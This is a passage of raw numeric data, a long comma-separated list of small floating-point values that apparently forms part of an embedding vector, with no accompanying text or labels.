.012270898,0.042438366,0.011663994,0.04530465,-0.025049796,-0.0029669674,0.00077577704,0.0057991045,0.00010962808,-0.005680433,-0.032130204,0.029957222,-0.013491714,0.012010484,-0.0075887493,-0.03801712,0.0018941731,-0.002874679,0.020139026,-0.007855982,-0.0042157467,-0.003131611,0.01652779,-0.0055257296,-0.0006506767,0.00017795278,-0.01784025,-0.01802552,0.04203847,-0.0044787605,-0.008106435,0.007985159,0.0048190583,0.0073740557,-0.015054481,0.007946756,-0.0047793486,-0.017672082,0.012955731,-0.022631366,-0.00094012,-0.00014704168,0.0057481187,0.0045844694,-0.013749115,-0.018040136,0.0004303703,0.003932766,-0.006293679,0.00044278346,-0.03271346,-0.0031331803,0.014950241,-0.012255099,0.016440887,-0.010899242,-0.028385565,0.011257657,0.008095138,0.026343118,-0.0037761857,-0.0057267076,0.0127840545,-0.008126023,-0.005300427,-0.025700929,-0.035182424,-0.022239944,0.022955516,-0.0067487597,0.008543367,0.0053479383,0.006252607,-0.013090066,-0.009235534,0.0030459804,-0.026988316,-0.024294874,0.009513594,-0.025733873,0.0019479251,0.035757136,-0.0067717084,0.014629733,0.010307657,-0.010455669,-0.02112983,-0.010486532,-0.013862277,-0.00041235928,-0.025346693,-0.026377583,-0.0042018867,0.0070978985,-0.012349228,-0.0212123,0.017568266,0.005824129,0.024584768,-0.008823069,0.013520181,0.020546444,-0.010379231,0.012667087,0.0041035893,-0.0012374216,-0.011322858,-0.002599471,0.016475018,0.026689567,-0.0031096572,0.011895786,-0.01805523,0.00018464927,0.020609247,-0.014569451,0.0073532914,-0.009883871,0.01741062,0.007148178,-0.010005235,-0.008223363,-0.0002159779,0.005385973,0.011081671,0.0293879,0.009281883,-0.000107263586,0.0060375677,-0.0025336281,-0.025422435,-0.0004684669,0.00012480754,-0.0009840471,-0.018768327,0.016821152,-0.011316962,0.01804997,-0.012348257,-0.023382295,0.021401646,-0.0059619173,0.0007641763,-0.030989386,-0.039712522,0.02200664,-0.014719275,-0.026111001,-0.037180834,0.0079524275,-0.0048265206,-0.00027429833,-0.016095322,-0.003212446,-0.008510317,-0.01921237,-0.02505446,0.0024034611,-0.009621944,0.0027894978,-0.0155543825,-0.018576311,0.01570323,0.010569362,0.006754039,0.008140079,-0.0017240173,0.018644687,-0.007047952,-0.034634676,0.0073534995,0.04048031,0.0011296128,0.026662206,-0.023279337,-0.011936036,-0.013287896,0.017144721,-0.0071156533,-0.009490396,-0.0069070426,0.014844762,-0.015789121,0.018865967,0.0052104746,-0.00010660847,0.044337463,0.01406061,-0.010309945,0.04141649,0.0000017754589,0.022798646,0.011000575,-0.017699203,-0.003605288,0.021298757,-0.031438917,0.0014208653,0.00016287468,0.0108622,0.03492325,-0.015504249,0.07164603,-0.008645502,0.0059719714,0.003908179,-0.0034038194,-0.0034309267,-0.0020809064,0.024690013,0.0015261907,0.00671293,-0.025836002,-0.013846293,-0.014578865,-0.015091038,0.009259753,0.022759378,0.0015547998,-7.117783e-7,0.013042247,0.00036756264,-0.016172357,0.002425761,-0.03854536,0.0020125262,0.0037056892,0.008212831,-0.011771916,-0.019537456,0.0007996164,-0.030252684,-0.028202944,0.035152007,-0.0018414902,0.010566336,-0.030771323,0.010827522,0.010484315,0.00668756,0.033793245,0.014025043,-0.009469646,-0.012730632,-0.010077156,0.008745281,-0.0007299498,-0.020254483,-0.034538154,-0.006084324,0.0066332454,-0.0011431109,0.022954075,-0.010900222,0.008341261,-0.03561347,0.0071968706,0.007869148,0.012389128,-0.005233988,0.00023551552,-0.007039322,0.050937217,-0.007225652,0.025095426,0.011996191,0.0011220693,-0.00087318046,-0.011130808,-0.0100951735,-0.004793624,0.006425907,0.023488194,-0.013531408,-0.017643617,-0.004885418,-0.019467149,0.004865349,-0.0053265514,0.03935401,0.013219672,0.021224001,-0.0024990928,-0.02241449,0.010388372,-0.0015866343,-0.015892334,-0.0014746373,-0.003897474,-0.0139775975,-0.009439674,-0.018356318,-0.0018501594,0.0008965793,0.024430709,-0.0038940192,-0.0181052,0.0016067862,-0.0050914874,0.030179264,-0.027828382,0.009033471,0.030380616,0.012014665,0.004651139,0.025219884,0.02191791,0.006987369,-0.01541076,0.0105940895,-0.02486812,-0.008822541,0.003520334,-0.0026660422,0.00047373946,-0.017841913,-0.02087113,0.025458027,0.012773339,-0.013876914,-0.0013481693,0.004260736,-0.02507398,0.015508779,0.0042436044,-0.0014573685,-0.0045867576,0.10152012,0.027214225,-0.0033443845,0.005329872,-0.0010291298,-0.004293325,0.0114809815,0.0039266804,0.0090006925,0.030234514,-0.024563348,0.0023311134,-0.005768059,0.00897303,-0.014289632,-0.03604018,0.047571797,-0.00640875,0.048297975,0.00062675064,0.0076662386,0.034369774,-0.0046437006,-0.016706714,-0.017255453,0.014339506,0.0006424025,0.0025718715,-0.030838162,0.0060107303,0.01588763,-0.003429195,-0.030374484,-0.040958684,0.008614259,0.0036662153,-0.01745069,0.021761142,-0.0110930875,-0.019685872,-0.019236103,0.0074418364,-0.01994095,-0.015470495,0.0043336446,-0.007905118,-0.0053320993,0.009194834,0.0106921485,-0.030245785,0.008612869,0.01856275,-0.017550679,0.019101806,-0.0028540997,0.028733026,0.0020725806,-0.0044974145,0.013765922,0.016433975,0.012395579,-0.0015187993,-0.0025641099,0.0012287755,0.011271039,0.016152399,0.021390356,-0.024200015,-0.012399734,0.005836351,-0.012764501,-0.019810889,-0.013605119,-0.006054509,0.0104725445,-0.0019168633,0.012972302,0.016777024,-0.018749528,0.010152563,-0.0059155407,-0.0018960482,-0.011462306,0.020092504,0.033765398,0.0036590972,-0.027499055,0.014039408,0.008055483,-0.019248834,-0.010274816,0.021046285,-0.0035921372,0.004493638,-0.0028556273,0.006143159,0.00997,-0.0146232555,0.020387694,0.0021420012,0.02325406,-0.026298804,-0.004738784,0.014549977,-0.012826867,-0.04559519,-0.017476944,-0.015886553,0.009424269,-0.002931072,0.019098567,0.007626518,0.0002042752,-0.025802772,0.0053189006,0.012219685,-0.03239133,-0.0191769,-0.0029591077,-0.029688029,-0.026875492,-0.00876192,0.002731282,0.0125029525,-0.0010605509,0.00697263,0.02343573,0.03504943,0.010144271,-0.0058250413,0.006467915,0.017725026,0.0035821004,0.0042491173,0.0380982,0.0023342236,0.0047380235,0.007694778,-0.022274084,-0.04395605,-0.01414151,-0.008519295,-0.0048304717,-0.0047240634,-0.0032533766,0.01672309,-0.0010236796,0.010597275,0.024786018,0.021690989,0.01993041,-0.00031388336,-0.011681743,0.005592901,0.035767734,0.038474675,-0.022692947,-0.02569471,0.021544173,0.013422231,0.013058678,0.013465454,-0.0028315263,-0.018007081,0.025927179,0.008234289,-0.012091503,0.018035881,0.0022235725,-0.017059285,0.03057123,0.004606312,-0.01194942,0.005563512,0.015141498,0.033978954,0.0116834575,-0.029992763,0.021383865,-0.009892406,0.0021631736,-0.010603374,0.010368509,-0.020516213,-0.008856274,-0.02225566,-0.0017029538,0.00029938988,-0.0015174316,0.0096061155,0.0046500457,0.0023222845,-0.009728794,-0.022386286,-0.0047693,-0.016066806,-0.014936484,-0.0033876034,0.0301862,0.00089036505,0.012699878,0.018685732,0.01586727,0.0076115774,-0.010249682,0.021803882,-0.030264687,0.035048835,-0.0013730575,0.0044261394,-0.016776571,-0.02336839,-0.0015702054,-0.026763877,-0.028229848,0.009864732,-0.002900262,0.013690729,-0.004505569,-0.019722722,-0.019377245,-0.004365013,0.013542455,-0.02507115,0.056084406,0.012922743,0.022647826,-0.017217163,-0.021517916,0.007853833,0.018480288,0.004153495,0.0012363225,0.013484861,0.016739761,0.010223095,-0.00095571,0.020475741,0.022659479,0.025078682,0.030548591,-0.0058175647,0.023228938,-0.012777174,-0.006966068,0.0034713852,0.003809909,0.00022115443,0.024402756,0.0024728372,0.01146002,-0.018669445,0.011387348,0.011799702,0.0090365475,-0.02185,0.017549088,-0.01539824,0.04024968,-0.000752178,-0.029660936,0.003879635,0.0051888134,-0.010262557,0.033515673,0.019678544,-0.0047610668,-0.026381876,0.012770525,-0.017566698,0.06347613,-0.012902028,-0.004927885,-0.019877125,0.0078057395,0.007759943,-0.016421026,0.006242565,-0.008928929,-0.013658035,-0.0039040502,0.004770736,-0.002985448,-0.0036700258,0.008036934,-0.02112828,0.004868406,0.0020478952,0.02766106,-0.007392696,-0.0073531982,0.004415244,0.025603171,-0.008463606,-0.020130979,-0.015570587,0.0062272158,0.014683177,0.024550432,0.013897173,0.03022328,0.010000238,0.028790446,0.03924462,0.010281226,-0.028188113,0.014461952,0.025345769,0.020096915,0.02705336,-0.0040992536,-0.002143477,-0.012408822,0.08827264,-0.017186852,0.019393202,-0.021690916,-0.0036438578,-0.015214667,-0.017344402,0.00928486,-0.011461412,0.011962849,0.0073486017,-0.01311772,0.008503401,-0.013528003,0.0024871512,-0.015609532,0.016394552,-0.010483692,-0.017780676,0.011303195,0.024499573,-0.00030198984,-0.017997479,0.01111562,-0.010948926,-0.007079908,0.0013816586,-0.0023621507,0.00008393731,-0.003619288,-0.0054805223,-0.011159586,-0.0274926,0.0002202955,-0.009481058,-0.0067682285,0.008252145,-0.028315697,-0.03385542,0.008116236,0.012427673,-0.020201439,0.015606843,-0.023391094,0.030084457,0.013804059,0.004403425,-0.08837445,-0.012970594,-0.01088792,0.00062119943,0.01289509,0.013340633,-0.004889299,-0.011763096,-0.01363549,0.0045232377,0.010228756,0.0023990162,0.008098121,-0.018980063,-0.008164012,0.029006433,0.01691396,-0.007470606,0.0011421228,0.0074781277,0.002815469,-0.016119424,0.020855322,-0.0078512225,-0.011846254,-0.024540238,-0.011054245,-0.02744584,-0.012145032,-0.013347154,0.013719999,0.0053637587,0.008534064,-0.012112715,-0.021099344,-0.0035884506,0.027837206,0.013610651,-0.0012038384,0.0024464729,-0.0046581626,0.10656185,0.011878721,-0.026374107,0.01508323,-0.017196393,0.013764274,-0.0070210085,-0.00057997,0.021210283,-0.0034879618,0.00047360573,-0.014953992,-0.02451994,-0.015841363,-0.0011428968,-0.00093014014,-0.015213693,-0.024864396,0.0056774956,0.021278417,0.014561621,-0.00779338,0.026677547,-0.02196023,0.0014136058,0.02530085,0.009471588,-0.0035805106,-0.010742602,-0.011215975,0.008356194,-0.012666103,0.018698843,-0.010712345,0.037769716,-0.0115142325,0.020940283,0.010487305,-0.023318492,0.00022981911,0.028004736,-0.023466844,0.02889367,-0.00020159208,0.012102203,-0.008755157,0.00048120497,0.033347696,-0.026067737,-0.014332388,-0.019958615,0.013094809,-0.009937345,0.01914923,0.025823181,0.021894135,-0.014772904,0.0043825675,-0.01027294,0.025762474,-0.012434677,-0.0069710785,0.0095832525,-0.0019512012,-0.0039909175,-0.0068118884,0.011503503,0.009856756,-0.0026208838,-0.009958956,-0.013551635,-0.03421183,0.011636346,-0.002192827,0.055447064,-0.029404577,-0.012547431,0.01633113,0.014500733,-0.023824425,0.021863606,-0.004330077,-0.0012266015,0.010214721,-0.015600683,-0.017119555,-0.029673249,0.011977133,-0.007710217,0.0037887008,-0.009457376,0.005049084,0.013709759,0.0023601335,0.015255008,0.009662986,-0.004904269,0.0053285295,-0.0020335834,-0.016310573,0.001990476,0.009874543,0.012473868,0.0029801105,-0.0025057187,0.023395026,0.0070404666,-0.022606326,0.025268314,-0.026594099,0.006032862,0.026673513,-0.038326725,0.02209742,-0.023511894,-0.011590598,-0.011571296,0.0015480046,-0.0030851534,-0.014702127,0.0019159188,0.0152522605,-0.011913265,0.01099383,0.030789133,0.011282733,-0.020132877,-0.007014729,0.026388073,0.01757032,-0.005133311,-0.0011315703,0.0024760028,-0.013246391,0.026110275,-0.013803096,-0.0040004565,0.020568356,-0.007319676,-0.00784412,-0.030152429,0.009013898,0.023554303,0.009210481,0.04374637,-0.012652441,0.010029641,-0.005331693,0.011539628,0.00076528266,0.0150078945,0.0034718178,0.013906379,-0.034084994,0.009081562,0.0013260561,-0.002347144,0.0039695627,0.011638477,-0.01762438,-0.0087669315,-0.019509478,0.016030332,0.027283462,0.0163642,-0.02561223,-0.026538964,-0.0030689386,0.001624155,0.014371427,-0.00014562221,0.011208171,-0.0037237534,0.016231759,0.0013082821,-0.01661955,-0.009746878,-0.0021539887,0.005212901,0.023888636,-0.004505483,-0.037528537,0.013657285,-0.015056393,0.0117583675,0.0026793117,0.017612593,0.010840231,0.011796522,-0.007018681,-0.040919784,-0.012114118,-0.009797048,-0.02074426,0.045674864,0.021741923,0.020049646,-0.014612342,-0.0053421515,0.011665472,-0.001902165,0.01797419,-0.002084434,0.043929197,0.007259253,0.00076319114,0.025637375,-0.002784094,-0.021202806,-0.00036695154,-0.006572403,0.0047194855,-0.025049454,0.01575406,-0.021855097,0.008271888,-0.032449897,0.025768662,-0.027760366,0.0021196506,0.021296313,-0.041934,-0.025868068,-0.022526717,-0.010096412,0.003981101,-0.0057553845,0.017544879,0.0020305808,0.058006044,-0.008025743,-0.019262532,0.022275688,-0.025644233,0.0033287574,-0.019144928,0.029788444,-0.05160242,-0.0094215665,-0.012031791,0.0013181532,-0.0017752482,0.0036242278,0.017851347,-0.010157917,0.009029053,-0.014890806,-0.01046251,-0.029156283,-0.008029814,-0.0055538,0.03158724,0.0034058806,-0.013369435,0.0047323396,-0.021356508,0.027431803,-0.0039294274,-0.020192109,0.005176299,-0.009914524,-0.027649619,0.009185989,-0.0026988687,-0.011357997,0.0051601543,0.010129979,-0.008308596,0.010780758,-0.019271104,0.02422221,-0.00054495235,-0.022060437,-0.0062817764,0.0013076244,-0.026015282,-0.03122643,-0.008441914,-0.006609418,0.027495723,-0.00576127,-0.0012560429,-0.04314336,0.002519733,0.024072481,0.0021201079,-0.0032941622,-0.0202133,-0.0034494365,0.0076473174,0.01343595,-0.0099525675,0.009692688,-0.010181756,-0.0054769977,0.0071830987,0.03607582,0.020336434,0.005300746,-0.0056529655,-0.019427054,0.010028919,0.0048324484,-0.0034009346,0.016138485,0.0067937183,0.025328523,-0.04955409,-0.027035074,0.024304692,-0.017694438,-0.0015994131,-0.007791774,-0.03585399,0.0039881775,-0.008001515,0.021400971,0.012157608,-0.008691288,-0.0118418755,0.002872034,-0.006112031,-0.0012773519,-0.0100253895,-0.007275783,0.01259626,-0.040837735,0.016301168,-0.003158432,0.0069128335,0.023143644,0.008499715,0.05028733,-0.020705048,0.008022667,0.0046446505,-0.0062590814,-0.012444329,0.017064786,0.030331362,-0.0039436547,-0.0046814824,-0.0023620008,-0.014575258,-0.0030839841,0.020942293,-0.009147543,-0.028187986,-0.008058649,-0.00030864181,0.019857982,-0.011331352,0.0026942703,0.010320786,0.0023594422,0.02729932,-0.028518084,-0.008261515,0.004081022,-0.0026445996,-0.00519743,-0.007996467,-0.0024758878,-0.015288296,0.031971086,0.028770817,0.0017033,-0.00062585855,-0.013093897,-0.010310231,-0.011101432,0.008318091,-0.020660946,0.008610032,0.012797551,-0.0024314052,0.00030388724,0.0070230835,0.013213178,0.01665917,-0.0050284304,0.008443362,-0.013859945,0.0126434555,-0.007791199,0.043682326,0.0033614798,0.00011912818,-0.0010064794,-0.00953031,0.0017166878,-0.00683776,0.002694918,0.00062235084,0.015362908,-0.0017586565,0.0016411431,0.0073945103,0.01647939,0.0008630666,-0.0029593515,0.011921343,-0.03135231,0.022803852,-0.01994987,0.02978996,0.00040057863,0.014742335,-0.0074829254,-0.0036463297,0.015495025,-0.013082689,-0.000101396094,0.013815668,0.0033262612,-0.0025686896,-0.0184426,-0.00316246,-0.021371532,-0.0028020681,-0.022387683,-0.0054075187,0.030463438,-0.0018771827,0.004651807,0.005084497,0.0188236,-0.017778708,-0.004088954,0.00911142,-0.008997091,-0.026729072,-0.0049326164,-0.023613852,0.0056988713,-0.009097383,0.0074642985,0.017666489,0.026408684,0.011658189,0.00697106,0.0013752028,0.00037017863,-0.005595217,0.023659257,0.08614432,0.004521533,-0.07178829,-0.018406017,0.020893544,-0.029929722,0.017676163,-0.015216303,0.051517908,-0.007924124,-0.008806468,0.021942092,0.008717763,0.021363085,0.0043488955,0.0064930087,-0.017579813,0.016082674,0.016416604,-0.017155321,0.02210638,0.024691675,0.0053853462,-0.013024497,0.020459078,-0.013308891,-0.004689122,-0.030691389,0.0013507047,-0.031930555,0.0035118982,0.0077140117,-0.027448427,-0.0023790738,-0.011360653,0.0023822628,0.01613374,0.022255894,0.004806486,0.0012503138,0.013536637,0.015729727,0.013745238,-0.014297341,0.019645993,0.03950866,0.008417745,0.010240395,0.0069355248,-0.022078415,0.0012144686,-0.0012436225,-0.017037224,0.010802825,0.006364613,0.008191554,-0.018832194,0.0021961788,0.021840628,0.008425414,-0.008055124,0.018632263,-0.03392869,-0.012858616,0.01632939,-0.0062200394,-0.015402348,-0.00032838876,-0.017136598,-0.003460213,-0.019077063,0.0022313783,0.007880785,0.016440572,0.015122285,-0.014562822,0.011992386,-0.0124028195,0.014966249,-0.00039509113,0.0077077607,-0.023090502,0.0054731662,0.011504595,0.0022692906,0.016516887,-0.0026348755,-0.018379392,-0.03237269,0.025795192,0.02565778,0.018326651,-0.0001265307,0.01710578,-0.008575385,0.008537158,-0.014966043,0.018923849,0.02797588,0.00391877,0.0022754495,0.0041684667,0.0010957967,0.0058916123,0.0046221167,0.021141117,0.0049716993,-0.023518737,0.021843107,-0.006811958,-0.018884117,0.01076476,0.010279229,-0.016961047,0.006835597,-0.037344866,-0.006539262,0.029308455,-0.014920277,-0.017837917,0.021275777,0.01904179,-0.011416342,-0.020043638,0.013021639,0.038370848,-0.020422833,-0.0021838855,-0.0064549935,-0.008226418,0.008109808,-0.022112058,-0.0022994874,0.025287243,0.004241521,-0.009107594,-0.009790807,0.013157516,0.025382975,-0.0010970978,-0.0045253164,0.0025497514,0.00067175605,-0.025083778,0.006535093,0.0017394511,-0.030943552,-0.007012226,-0.026708852,0.007709376,0.021150228,0.010697487,-0.03292743,-0.012400897,0.014666628,0.019293187,-0.0010972111,-0.00424353,0.004874089,0.005396281,0.0013499848,-0.0130770495,0.03011861,0.008278401,0.005103401,-0.0071919826,-0.018346746,-0.012913808,0.0018931217,0.018250816,0.007949818,0.022795618,0.006212086,-0.03745224,-0.010350223,0.0095865205,0.019803163,0.015871579,-0.023059167,-0.015007658,0.0008531958,-0.017675128,-0.020892644,-0.004618575,-0.018329911,0.0069377194,0.005569448,-0.0066633252,0.014243201,-0.002029033,-0.0012559528,0.032365,0.00645788,0.009797186,0.044701554,0.025848906,0.011321887,-0.016309274,-0.010536076,-0.008533995,-0.0057891905,-0.0008135032,-0.026263334,0.03513973,-0.040334668,0.009204639,0.025604434,0.028225085,0.013311613,-0.013668991,0.0056444085,-0.018661108,-0.012808548,-0.006519761,0.014994635,-0.0264726,0.0011249962,0.008169733,-0.020631436,0.0003965059,0.001016828,-0.009043589,0.034538604,-0.026904494,0.014461922,-0.00006874084,-0.0030307642,-0.016516177,0.013076485,0.01878888,-0.02134332,0.009067899,-0.010917421,-0.02902356,0.018591179,-0.003470667,0.0016923698,-0.0097448705,-0.021923097,0.01939662,-0.0011930612,-0.006393476,-0.017246298,-0.012747743,0.018497927,0.00052343577,-0.007817593,-0.01875782,0.0025277287,0.009353369,0.0026173282,-0.00076921924,0.007821182,0.007303089,0.014217056,0.00006344087,-0.022678677,-0.021595849,-0.041576333,0.019544326,-0.003899725,-0.005409005,0.021987734,0.008827579,0.012482904,-0.010015514,0.031046985,0.011030224,-0.01583221,0.008265582,0.016084699,0.019626318,0.024103658,0.05381117,0.01098057,0.021748569,0.003407763,0.012936118,0.0060470523,0.030655446,0.0022074473,-0.012443376,0.005025036,0.001011995,0.014322162,0.0007707456,-0.018107861,-0.0016023706,0.021181358,0.018712882,0.0192004,0.008947584,0.0010470212,0.0072621084,0.0029162352,0.009523669,-0.018970396,0.0071095065,0.027490348,0.009520223,-0.018186454,-0.012357992,-0.0018721069,0.0051406305,0.011060224,0.014550913,-0.0034831068,0.004076988,0.023996409,-0.0072970423,0.02922574,0.0032151616,0.014606122,-0.010790227,-0.030903269,0.030682478,0.016926097,0.014982758,-0.016094275,0.0037549105,-0.0023650592,0.018347958,0.040504526,0.0070383423,0.00266285,0.024859298,-0.005083214,0.001366363,0.030125069,-0.01196442,0.016923612,0.012709413,0.0057415795,0.049264316,-0.008316844,0.00272129,0.025098536,0.007777082,0.017393243,-0.0016912523,0.002213581,0.020201635,-0.0062944777,0.003053945,-0.015680417,0.005320105,0.008257678,0.006009839,-0.0048257923,0.012296987,-0.011369242,-0.0058933003,-0.011465022,0.00086285686,0.008849614,-0.004966575,-0.00016109057,-0.040838916,-0.031830918,0.017629288,0.01760723,-0.0005816892,-0.030474586,-0.016614594,-0.01871539,-0.009985997,0.021079862,-0.033337377,0.011422783,0.013004172,0.009350881,0.072960116,0.0040951576,0.015604971,0.013652446,0.019591877,-0.002456279,0.007244868,-0.011199952,-0.014044272,0.0024428589,0.01214055,0.023477048,-0.029488271,0.0037415496,0.016520072,-0.023563474,0.014228792,0.0031589868,0.0025089756,-0.005934029,-0.03514057,-0.004285935,-0.015166527,0.013528419,0.00030264922,-0.0023063205,-0.015389816,-0.008768743,-0.027059965,-0.0039998936,0.020177444,-0.007989666,-0.0030465466,0.00069408555,-0.011672773,-0.03857555,0.008341022,0.01682252,0.0026949684,0.0034437464,0.0021394913,-0.016494509,0.019536734,-0.0036356284,-0.013392212,0.0025744098,0.020412015,-0.013425433,0.014378251,-0.005810975,0.01648177,-0.038023725,0.012973399,-0.04033887,-0.0054848357,-0.022239659,0.007922876,0.11530175,-0.015665695,-0.006305108,0.02025919,-0.045985244,-0.022170955,0.013014169,0.01519189,-0.022515815,-0.0015396533,0.0017882098,0.008094839,0.02973576,0.0005779312,-0.027410766,0.01023909,-0.012751771,0.02411566,0.025516272,-0.008011946,0.0012378533,-0.0043706633,0.017561665,0.01981195,0.01311203,-0.0151063595,-0.0039396267,-0.009195087,-0.022155859,-0.028574355,0.0122158695,-0.006543316,-0.007169258,-0.024627995,0.025329417,0.0073744003,-0.048991073,0.0068897367,0.016386813,-0.015806794,0.0056966436,-0.014437202,0.002269017,0.0077077253,-0.031823516,-0.044337817,0.010933632,0.000020845055,-0.015207473,-0.0032421432,-0.007178761,0.026919093,0.01221524,-0.021855233,-0.022871446,0.0071537634,0.0008485981,0.024593279,-0.015242582,-0.008890211,-0.013485331,-0.0091693215,-0.0033862318,0.016782342,0.013668742,0.0071906815,0.020369083,-0.007809054,0.008700665,-0.0045003043,-0.009307456,0.00014898342,-0.004431825,-0.001317118,-0.00892424,-0.010868197,-0.02242075,0.0029716822,0.010846343,-0.008492629,0.017447315,-0.006535409,-0.014516597,-0.018754777,0.0013268616,-0.008831293,-0.005766167,0.012476911,-0.0055685514,0.010848448,0.00047983424,-0.025862884,-0.020558905,0.0061086295,0.015665676,-0.0010497414,-0.00015160714,0.008003864,-0.002725183,0.0056253676,-0.017014053,0.023508176,0.034380727,0.0050430703,0.00085729087,-0.01639429,0.0050203595,-0.02705571,0.008053284,-0.01534309,-0.000033056833,-0.020509996,-0.02285771,-0.017932288,-0.0066032717,-0.028192334,0.018914388,0.0006537773,-0.023650123,-0.012633128,0.011903264,0.011589832,0.001074837,0.027069494,-0.016005928,-0.02411873,-0.007704194,0.018355638,0.012284346,0.0074815163,0.004217088,0.013843807,0.018126635,0.026610719,-0.024329998,-0.002748876,0.00478519,0.00865014,-0.0016558364,-0.0022620829,-0.017029224,0.0020874403,-0.025824258,-0.0064573907,-0.013397381,-0.011503839,0.0027820896,0.011542416,0.02530199,0.0008493864,0.011605835,0.036538217,-0.018827928,0.008148532,0.007212758,-0.004559471,0.0274238,0.014561642,0.018802714,0.009528404,-0.000046511515,0.03115149,-0.012435715,-0.023064872,-0.011014223,-0.0067001856,0.010018013,0.011436129,0.012741172,-0.0079991,0.014240368,-0.009252938,-0.008454607,-0.023583718,-0.0023035647,0.014916526,0.0136273755,0.036701176,-0.0001227312,0.012115123,-0.008975183,-0.0017171113,-0.003126095,0.00056649913,0.00019039026,-0.012654387,0.00930576,-0.01373316,0.0032277303,0.0015266106,0.0061398577,-0.0077342913,-0.0064365217,0.016911635,-0.0026255609,-0.027377475,0.006117037,-0.0056039174,-0.021461403,0.0123451715,-0.01687926,0.032165017,-0.038549844,0.0048951562,-0.0020888534,0.028651526,-0.0018167667,0.028320177,-0.0011676654,0.0017347338,-0.009670458,-0.0066961045,-0.008575847,0.0052258275,-0.0059534744,-0.0054428987,-0.008968546,0.01580762,0.0057605645,0.011306276,0.0062881755,0.017455485,0.0018725911,-0.022403475,-0.018303659,0.017781222,-0.035225257,0.0065775,0.016489936,-0.0085615,-0.007825861,0.0153227085,-0.01648842,-0.008115396,-0.025757,-0.008297112,-0.031847313,0.036927007,-0.014628245,-0.02846936,-0.0021481067,0.018100224,-0.0120879505,-0.018806186,-0.0052160127,0.019723227,-0.010205259,-0.014443344,-0.012896004,0.00025272643,-0.014921188,0.0061191376,0.0069280467,-0.0006337838,0.011422708,0.0020140554,0.0007429127,0.031240059,0.014673803,-0.03206392,-0.009401351,0.01642201,0.021912863,-0.02060744,-0.013020328,0.0007916252,-0.0033575767,-0.002856751,0.002588454,-0.011526748,-0.014927795,-0.002241791,0.029936116,-0.012917777,-0.023112973,0.012505391,-0.027319077,0.011675023,-0.029001737,0.016744768,0.058053263,0.012308487,-0.02916069,-0.0015263482,0.019449726,0.015359986,-0.019711003,-0.005542635,0.008886786,-0.01151379,-0.024386121,-0.011824962,-0.0394807,0.020106345,-0.015577747,0.0043624034,-0.060972903,0.010067269,-0.015335264,0.010002226,-0.015424607,-0.019275598,0.009995266,-0.028648429,-0.0070664147,-0.010406161,0.020584093,0.0045259045,0.03168414,-0.003929362,-0.025823666,0.00431692,0.009309046,-0.01240181,0.00792468,0.009949599,0.0053474763,0.0114299515,0.00085898064,-0.008805124,-0.002942109,-0.017436652,0.009832498,0.0025916372,0.0005029933,-0.051085055,-0.037640024,0.015342229,-0.014650321,-0.012279514,0.024004493,-0.020966051,-0.0038728681,-0.016991049,-0.0092140995,-0.031955842,-0.014077046,0.010010951,0.005641733,-0.00902987,-0.012222097,0.021185657,-0.0029221107,-0.024599768,-0.010566273,0.0043582027,-0.010995179,0.023020584,0.0053947913,-0.010003815,0.019650968,-0.006926346,0.003525904,0.0029299343,-0.021863008,0.00995955,-0.008537469,-0.0026798884,-0.02660152,-0.009068511,-0.007553105,-0.009846377,-0.0015513923,0.0033174441,-0.00008291823,-0.008114635,0.0069512543,0.0025628034,-0.0016388987,0.00066256715,0.020795697,0.010714543,0.0039612176,-0.013941275,-0.01957595,0.003042799,0.019706858,-0.027085513,0.0026141105,0.031170392,-0.01463227,0.008939831,0.013397444,-0.008028459,-0.0063041477,0.009462613,0.031475537,0.033420693,-0.01766615,0.0072219116,-0.004387377,-0.01024419,-0.00796618,0.009356627,-0.006635458,-0.016082674,0.015055489,0.01335048,0.002806623,-0.0027542803,-0.006350615,-0.00029015524,-0.015407679,-0.008867056,-0.018788958,0.0058397134,-0.002975747,-0.0065319324,0.021717567,-0.003996399,0.012974766,0.002547913,-0.0002479597,-0.02028803,-0.005157531,-0.045586128,0.010937659,-0.020446274,0.016279204,0.014425608,-0.031760927,-0.0024950523,0.012240172,-0.012455859,-0.024831641,0.012572458,0.011754433,-0.0053839753,0.012905521,0.014033912,0.015676066,-0.004207074,-0.00053010846,-0.011448156,0.034405127,-0.00882599,-0.017597271,0.0026563013,0.03245668,0.0001708809,0.002109015,0.0037853466,0.012545614,0.009987641,0.017517848,-0.04013677,0.016546102,-0.033418152,-0.004638256,-0.0036703183,-0.004833528,0.00223078,-0.0034894776,-0.03902388,0.029684024,-0.013307205,-0.022752367,0.009491747,0.0035577435,-0.015348577,-0.0084955115,0.0010242742,0.01528799,0.010187949,-0.015308853,0.006242144,-0.010705364,-0.020824244,-0.014138404,-0.01283911,0.000056016645,-0.005840723,0.009349953,-0.004904783,-0.0012380256,-0.017605789,-0.007146019,-0.029248346,-0.002148053,0.02247221,0.0015067544,-0.0066812877,-0.0066229906,0.000943382,0.0095685525,-0.028145902,-0.018889625,-0.005801259,0.0495332,0.032763965,-0.022238808,0.010830489,-0.009049313,0.034985214,-0.009941356,0.025946733,0.053320553,0.0011466584,0.011838426,-0.03168511,-0.03182223,-0.041086536,-0.009683188,0.0030807795,-0.0026914845,-0.007052102,-0.024549682,-0.015012427,0.013047767,-0.008698347,-0.010611038,-0.00840165,-0.006665409,0.0222298,-0.004641196,0.0007949491,-0.016183283,-0.016852733,0.0062535536,-0.004709303,0.020824663,0.004652765,-0.0076502347,0.0134941125,0.0063812905,0.0045971232,-0.010264468,-0.02237958,0.017648028,-0.022313239,0.010863601,-0.0074637127,0.030156,-0.02376005,0.012252838,0.0015911344,0.01791813,0.011564815,-0.026756836,0.016761823,-0.006514981,0.022046762,-0.013748131,0.016161297,-0.010779494,0.013411971,-0.006044248,-0.005405991,-0.005558774,-0.0036436988,0.0114986915,0.013058102,-0.018821323,-0.017542414,-0.033474263,-0.012104332,0.007221417,1.1504725e-7,0.006927082,0.0008068801,-0.004312649,-0.007933817,-0.008722248,-0.008628836,0.011422832,-0.009744969,0.050018296,0.014598628,0.00041862676,0.00247954,-0.012372913,-0.0012107798,0.013341748,-0.02736827,0.010645805,0.0023085135,0.0014948994,0.034316704,-0.0013077786,0.01589523,-0.03833992,-0.01080453,0.010038484,0.0013765255,-0.01615865,-0.026521856,0.00026789686,-0.0058164024,0.003470658,0.02437119,-0.033377137,-0.026537143,-0.025460029,-0.012096551,0.0876309,0.0018069056,-0.027460987,-0.026925849,0.00082971354,-0.026077434,-0.044275183,-0.0032886732,-0.01313138,-0.005544186,0.0035974241,0.0014315933,0.010087506,0.0014662037,0.016742393,0.007869763,0.019261537,0.07462163,0.004109367,-0.0008588673,0.004240499,-0.00061781256,0.02645782,-0.0060176514,0.019220212